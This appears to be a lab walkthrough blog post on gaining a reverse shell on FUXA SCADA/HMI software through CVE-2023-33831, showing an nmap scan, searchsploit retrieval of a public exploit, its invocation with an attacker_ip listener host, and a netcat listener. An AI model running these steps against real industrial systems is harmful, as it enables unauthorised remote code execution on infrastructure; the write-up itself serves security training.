Today's lab focused on identifying and exploiting a vulnerability in FUXA (Web-based SCADA/HMI software), leading to Remote Code Execution.

This machine highlighted how exposed industrial or automation services can introduce serious attack surfaces if not properly secured.

🧭 Step 1: Full Port Enumeration

Started with a complete port scan:

nmap -p- -sCV -A β€” min-rate 1000 192.168.xx.xx

Explanation:

  • -p- β†’ Scan all 65535 ports
  • -sC β†’ Default NSE scripts
  • -sV β†’ Service version detection
  • -A β†’ OS detection + scripts
  • β€” min-rate 1000 β†’ Faster scanning
None

Discovered:

  • Web service running on port 1881
None

🌐 Step 2: Service Enumeration

Accessed the service:

http://192.168.xx.xx:1881

Identified the application as:

FUXA

None

Further version analysis confirmed vulnerability to:

CVE-2023–33831

None

πŸ”Ž Step 3: Vulnerability Analysis

CVE-2023–33831 affects FUXA due to improper input validation in specific request handlers.

Impact:

  • Remote Code Execution (RCE)
  • Unauthenticated command execution (in vulnerable versions)

This makes it a critical vulnerability in exposed SCADA environments.

πŸ’₯ Step 4: Exploit Preparation

Downloaded public exploit proof-of-concept:

searchsploit CVE-2023–33831

Copied exploit locally:

searchsploit -m <exploit_id>

Gave execution permission:

chmod +x exploit.py

None

⚑ Step 5: Running the Exploit

Executed the exploit script:

python3 exploit.py β€” rhost http://192.168.xx.xx:1881 –rport 1881 -lhost <attacker_ip> -lport 1234

None

On attacker machine, started listener:

nc -lvnp 1234

After execution, reverse shell connection was received.

None

πŸ–₯ Step 6: Shell Verification

Once connected:

whoami id uname -a

Confirmed command execution on the target system.

🏁 Final Outcome

βœ”οΈ Full Port Scan βœ”οΈ Service Identification βœ”οΈ CVE Mapping βœ”οΈ Exploit Deployment βœ”οΈ Reverse Shell Access

πŸŽ₯ Full Practical Demonstration For a complete step-by-step video walkthrough, watch here: